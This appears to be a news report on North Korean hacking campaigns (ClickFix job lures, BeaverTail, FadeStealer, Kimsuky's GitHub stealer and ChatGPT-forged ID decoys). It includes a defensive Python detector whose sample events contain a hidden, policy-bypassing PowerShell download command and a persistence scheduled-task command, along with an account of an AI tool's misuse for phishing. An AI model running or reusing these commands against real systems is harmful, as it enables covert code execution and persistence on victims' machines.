Threat actors with ties to the Democratic People's Republic of Korea (aka DPRK or North Korea) have been observed leveraging ClickFix-style lures to deliver two known malware families, BeaverTail and InvisibleFerret.

"The threat actor used ClickFix lures to target marketing and trader roles in cryptocurrency and retail sector organizations rather than targeting software development roles," GitLab Threat Intelligence researcher Oliver Smith said in a report published last week.

First exposed by Palo Alto Networks in late 2023, BeaverTail and InvisibleFerret have been deployed by North Korean operatives as part of a long-running campaign dubbed Contagious Interview (aka Gwisin Gang), wherein the malware is distributed to software developers under the pretext of a job assessment. Assessed to be a subset of the umbrella group Lazarus, the cluster has been active since at least December 2022.

Over the years, BeaverTail has also been propagated via bogus npm packages and fraudulent Windows videoconferencing applications like FCCCall and FreeConference. Written in JavaScript, the malware acts as an information stealer and a downloader for a Python-based backdoor known as InvisibleFerret.

An important evolution of the campaign involves the use of the ClickFix social engineering tactic to deliver malware such as GolangGhost, PylangGhost, and FlexibleFerret – a sub-cluster of activity tracked as ClickFake Interview.

The latest attack wave, observed in late May 2025, is worth highlighting for two reasons: Employing ClickFix to deliver BeaverTail (rather than GolangGhost or FlexibleFerret) and delivering the stealer in the form of a compiled binary produced using tools like pkg and PyInstaller for Windows, macOS, and Linux systems.


A fake hiring platform web application created using Vercel serves as a distribution vector for the malware, with the threat actor advertising cryptocurrency trader, sales, and marketing roles at various Web3 organizations, as well as urging targets to invest in a Web3 company.

"The threat actor's targeting of marketing applicants and impersonation of a retail sector organization is noteworthy given BeaverTail distributors' usual focus on software developers and the cryptocurrency sector," Smith said.

Users who land on the site have their public IP addresses captured and are instructed to complete a video assessment of themselves. At that point a fake technical error about a non-existent microphone issue is displayed, and they are asked to run an operating system-specific command to supposedly fix the problem. Doing so deploys a leaner version of BeaverTail by means of either a shell script or a Visual Basic Script.

"The BeaverTail variant associated with this campaign contains a simplified information stealer routine and targets fewer browser extensions," GitLab said. "The variant targets only eight browser extensions rather than the 22 targeted in other contemporary BeaverTail variants."

Another important omission is the removal of functions related to stealing data from web browsers other than Google Chrome. The Windows version of BeaverTail has also been found relying on a password-protected archive shipped along with the malware to load Python dependencies related to InvisibleFerret.

While password-protected archives are a fairly common technique that various threat actors have adopted for some time, this is the first time the method has been used for payload delivery in connection with BeaverTail, indicating that the threat actors are actively refining their attack chains.

What's more, the low prevalence of secondary artifacts in the wild and the absence of social engineering finesse suggest that the campaign may have been a limited test that is unlikely to be deployed at scale.

"The campaign suggests a slight tactical shift for a subgroup of North Korean BeaverTail operators, expanding beyond their traditional software developer targeting to pursue marketing and trading roles across cryptocurrency and retail sectors," GitLab said. "The move to compiled malware variants and continued reliance on ClickFix techniques demonstrates operational adaptation to reach less technical targets and systems without standard software development tools installed."

The development comes as a joint investigation from SentinelOne, SentinelLabs, and Validin found that at least 230 individuals have been targeted by the Contagious Interview campaign in fake cryptocurrency job interview attacks between January and March 2025 by impersonating companies such as Archblock, Robinhood, and eToro.

This campaign essentially involved using ClickFix themes to distribute malicious Node.js applications dubbed ContagiousDrop that are designed to deploy malware disguised as updates or essential utilities. The payload is tailored to the victim's operating system and system architecture. It's also capable of cataloging victim activities and triggering an email alert when the affected individual starts the fake skill assessment.

"This activity [...] involved the threat actors examining cyber threat intelligence (CTI) information related to their infrastructure," the companies noted, adding that the attackers engaged in a coordinated effort to evaluate new infrastructure before acquiring it, as well as to monitor for signs that their activity had been detected, using Validin, VirusTotal, and Maltrail.

The information gleaned from such efforts is meant to improve the resilience and effectiveness of their campaigns, as well as rapidly deploy new infrastructure following service provider takedowns, reflecting a focus on investing resources to sustain their operations rather than enacting broad changes to secure their existing infrastructure.

"Given the continuous success of their campaigns in engaging targets, it may be more pragmatic and efficient for the threat actors to deploy new infrastructure rather than maintain existing assets," the researchers said. "Potential internal factors, such as decentralized command structures or operational resource constraints, may restrict their capacity to rapidly implement coordinated changes."

"Their operational strategy appears to prioritize promptly replacing infrastructure lost due to takedown efforts by service providers, using newly provisioned infrastructure to sustain their activity."

North Korean hackers have a long history of attempting to gather threat intelligence to further their operations. As early as 2021, Google and Microsoft revealed that Pyongyang-backed hackers targeted security researchers working on vulnerability research and development using a network of fake blogs and social media accounts to steal exploits.

Then last year, SentinelOne warned of a campaign undertaken by ScarCruft (aka APT37) targeting consumers of threat intelligence reporting with fake technical reports as decoys to deliver RokRAT, a custom-written backdoor exclusively used by the North Korean threat group.

However, recent ScarCruft campaigns have witnessed a departure of sorts, taking the unusual step of infecting targets with custom VCD ransomware, alongside an evolving toolkit comprising stealers and backdoors CHILLYCHINO (aka Rustonotto) and FadeStealer. A Rust-based implant, CHILLYCHINO is a new addition to the threat actor's arsenal from June 2025. It's also the first known instance of APT37 using a Rust-based malware to target Windows systems.

FadeStealer, on the other hand, is a surveillance tool first identified in 2023 that's equipped to log keystrokes, capture screenshots and audio, track devices and removable media, and exfiltrate data through password-protected RAR archives. It leverages HTTP POST and Base64 encoding for communication with its command-and-control (C2) server.

The attack chain, per Zscaler ThreatLabz, entails using spear-phishing messages to distribute ZIP archives containing Windows shortcuts (LNK) or help files (CHM) that drop CHILLYCHINO or its known PowerShell counterpart Chinotto, which then contacts the C2 server to retrieve a next-stage payload responsible for launching FadeStealer.

"The discovery of ransomware marks a significant shift from pure espionage operations toward financially motivated and potentially destructive activity," S2W said. "This evolution highlights not only functional diversification but also a broader strategic realignment in the group's objectives."

New Kimsuky Campaigns Exposed

The findings also come as the North Korea-aligned Kimsuky (aka APT43) hacking group has been attributed to two different campaigns, one of which abuses GitHub repositories to deliver stealer malware and exfiltrate data. Kimsuky also allegedly suffered a breach recently, which likely exposed the tactics and tools of a China-based actor working for the Hermit Kingdom (or those of a Chinese operator emulating its tradecraft).


"The threat actor leveraged a malicious LNK file [present within ZIP archives] to download and execute additional PowerShell-based scripts from a GitHub repository," S2W said. "To access the repository, the attacker embedded a hardcoded GitHub Private Token directly within the script."

The PowerShell script retrieved from the repository comes fitted with capabilities to collect system metadata, including last boot time, system configuration, and running processes; write the information to a log file; and upload it to the attacker-controlled repository. It also downloads a decoy document to avoid raising any suspicion.

Given the use of trusted infrastructure for malicious purposes, defenders are advised to monitor traffic to api.github.com (particularly from scripting hosts such as PowerShell, which this campaign uses to fetch and run its stages) and to watch for the creation of suspicious scheduled tasks, which would indicate an attempt at persistence.
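As an added illustration of that detection advice (example code written for this article, not S2W's analysis tooling or anything recovered from the Kimsuky campaign), the Python script below runs simple correlation logic over a handful of constructed Sysmon-style process-creation and network-connection events. It flags a script host whose command line embeds a GitHub personal access token or pulls content from api.github.com, a script host that actually connects to a GitHub API endpoint, and a schtasks.exe /create invocation that registers a PowerShell task, noting when the task was created by a script host. The event field names, the repository path, the token value and the task name are all made up for the example; the "ghp_" token prefix and its 36-character body match GitHub's classic token format, while the fine-grained "github_pat_" length check is deliberately loose.

```python
import re
from collections import defaultdict

# GitHub personal access token shapes: classic tokens are "ghp_" plus 36 characters;
# fine-grained tokens start with "github_pat_" (length treated loosely here).
TOKEN_RE = re.compile(r"\b(?:ghp_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{22,})\b")
GITHUB_HOSTS = ("api.github.com", "raw.githubusercontent.com")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed sample telemetry, loosely modelled on Sysmon event ID 1 (process create)
# and event ID 3 (network connect). Nothing here was captured from a real incident.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4120, "ppid": 1, "image": "C:\\Windows\\explorer.exe",
     "cmd": "explorer.exe"},
    # Benign: an editor talking to the GitHub API on the user's behalf
    {"type": "process", "pid": 4300, "ppid": 4120,
     "image": "C:\\Users\\alice\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe",
     "cmd": "Code.exe"},
    {"type": "network", "pid": 4300, "dst_host": "api.github.com", "dst_port": 443},
    # Benign: an administrator running a local PowerShell command
    {"type": "process", "pid": 4400, "ppid": 4120, "image": PS,
     "cmd": "powershell.exe Get-Service"},
    # Suspicious: LNK-launched PowerShell pulling a script from a repo with an embedded PAT
    {"type": "process", "pid": 5210, "ppid": 4120, "image": PS,
     "cmd": "powershell.exe -w hidden -ep bypass -c \"$h=@{Authorization="
            "'token ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij'};"
            "iwr https://api.github.com/repos/example-org/docs/contents/s.ps1 -Headers $h\""},
    {"type": "network", "pid": 5210, "dst_host": "api.github.com", "dst_port": 443},
    # Suspicious: that PowerShell process registering a scheduled task for persistence
    {"type": "process", "pid": 5230, "ppid": 5210, "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmd": "schtasks.exe /create /sc minute /mo 30 /tn OneDriveSync "
            "/tr \"powershell -w hidden -f C:\\Users\\Public\\u.ps1\""},
]


def is_script_host(image):
    """True when the image's file name is one of the usual script interpreters."""
    return image.lower().rsplit("\\", 1)[-1] in SCRIPT_HOSTS


def redact(cmd):
    """Mask any token before the command line lands in an alert or SIEM field."""
    return TOKEN_RE.sub(lambda m: m.group(0)[:4] + "<redacted>", cmd)


def analyze(events):
    """Return {pid: {"image", "cmd", "reasons"}} for processes matching the campaign's
    shape: a script host fetching from GitHub with an embedded token, a script host
    actually connecting to a GitHub API host, and schtasks registering a PowerShell task."""
    procs = {}
    hits = defaultdict(list)
    for e in events:
        if e["type"] == "process":
            procs[e["pid"]] = e
            cmd, image = e["cmd"], e["image"]
            low = cmd.lower()
            if TOKEN_RE.search(cmd):
                hits[e["pid"]].append("hardcoded GitHub token in command line")
            if is_script_host(image) and any(h in low for h in GITHUB_HOSTS):
                hits[e["pid"]].append("script host fetching content from GitHub")
            if image.lower().endswith("schtasks.exe") and "/create" in low and "powershell" in low:
                reason = "schtasks creating a PowerShell task"
                parent = procs.get(e["ppid"])
                if parent and is_script_host(parent["image"]):
                    reason += " (spawned by a script host)"
                hits[e["pid"]].append(reason)
        elif e["type"] == "network" and e["dst_host"] in GITHUB_HOSTS:
            # Only escalate GitHub API traffic when it originates from a script host;
            # developer tooling talking to api.github.com is normal and stays quiet.
            owner = procs.get(e["pid"])
            if owner and is_script_host(owner["image"]):
                hits[e["pid"]].append(f"script host connected to {e['dst_host']}")
    return {
        pid: {"image": procs[pid]["image"], "cmd": redact(procs[pid]["cmd"]), "reasons": reasons}
        for pid, reasons in hits.items()
    }


if __name__ == "__main__":
    for pid, finding in analyze(SAMPLE_EVENTS).items():
        print(pid, finding["image"], finding["reasons"], finding["cmd"], sep="\n  ")
```

Two design choices matter in practice. First, raw volume to api.github.com is far too noisy to alert on by itself, so the network rule only fires when the owning process is a script interpreter; the benign editor connection above produces nothing. Second, the alert carries a redacted command line, so the very token the attacker hardcoded does not get copied into ticketing and SIEM systems where it would be readable by anyone with case access.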

The second campaign tied to Kimsuky concerns the abuse of OpenAI's ChatGPT to forge deepfake military ID cards in a spear-phishing campaign against South Korean defense-affiliated entities and other individuals focused on North Korean affairs, such as researchers, human rights activists, and journalists.

Phishing emails using the military ID deepfake decoy were observed on July 17, 2025, following a series of ClickFix-based phishing campaigns between June 12 and 18, paving the way for malware that facilitates data theft and remote control.

The multi-stage infection chain has been found to employ ClickFix-like CAPTCHA verification pages to deploy an AutoIt script that connects to an external server to run batch file commands issued by the attacker, South Korean cybersecurity company Genians said in a report published last week.

Alternately, the recent burst of attacks has also relied on bogus email messages that redirect unsuspecting users to credential harvesting pages, as well as on messages carrying booby-trapped links that, when clicked, download a ZIP archive containing an LNK file. The LNK file executes a PowerShell command to download the ChatGPT-generated synthetic imagery together with a batch script that ultimately runs the same AutoIt script, delivered inside a cabinet (CAB) archive file.

"This was classified as an APT attack impersonating a South Korean defense-related institution, disguised as if it were handling ID issuance tasks for military-affiliated officials," Genians said. "This is a real case demonstrating the Kimsuky group's application of deepfake technology."
